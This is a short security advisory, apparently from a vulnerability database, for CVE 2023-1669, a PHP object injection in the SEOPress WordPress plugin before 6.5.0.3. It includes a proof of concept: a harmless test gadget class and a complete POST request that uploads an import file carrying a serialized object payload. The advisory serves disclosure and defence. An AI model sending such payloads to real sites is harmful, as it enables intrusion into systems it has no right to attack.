SEOPress < 6.5.0.3 – Admin+ PHP Object Injection | CVE 2023-1669

Description

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

The view the response of the request made, which will have the "Arbitrary deserialization" message

POST /wordpress/wp-admin/admin.php?page=seopress-import-export HTTP/1.1
Host: {host}
Content-Length: 1247
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURsXiXeTIw5lD9oX
Cookie: {cookie}

------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="import_file"; filename="seopress-settings-export-03-04-2023.json"
Content-Type: application/json

{"seopress_activated":"","seopress_titles_option_name":"","seopress_social_option_name":"","seopress_google_analytics_option_name":"","seopress_advanced_option_name":"","seopress_xml_sitemap_option_name":"","seopress_pro_option_name":"","seopress_pro_mu_option_name":"","seopress_pro_license_key":"","seopress_pro_license_status":"","seopress_bot_option_name":"","seopress_toggle":"","seopress_google_analytics_lock_option_name":"","seopress_tools_option_name":"","seopress_dashboard_option_name":false,"seopress_instant_indexing_option_name":"","redirections":{"xxx":{"sources":"O:4:\"Evil\":0:{};"}}}
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_action"

import_rk_redirections
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_import_rk_redirections_nonce"

0e1a353e06
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=seopress-import-export
------WebKitFormBoundaryURsXiXeTIw5lD9oX--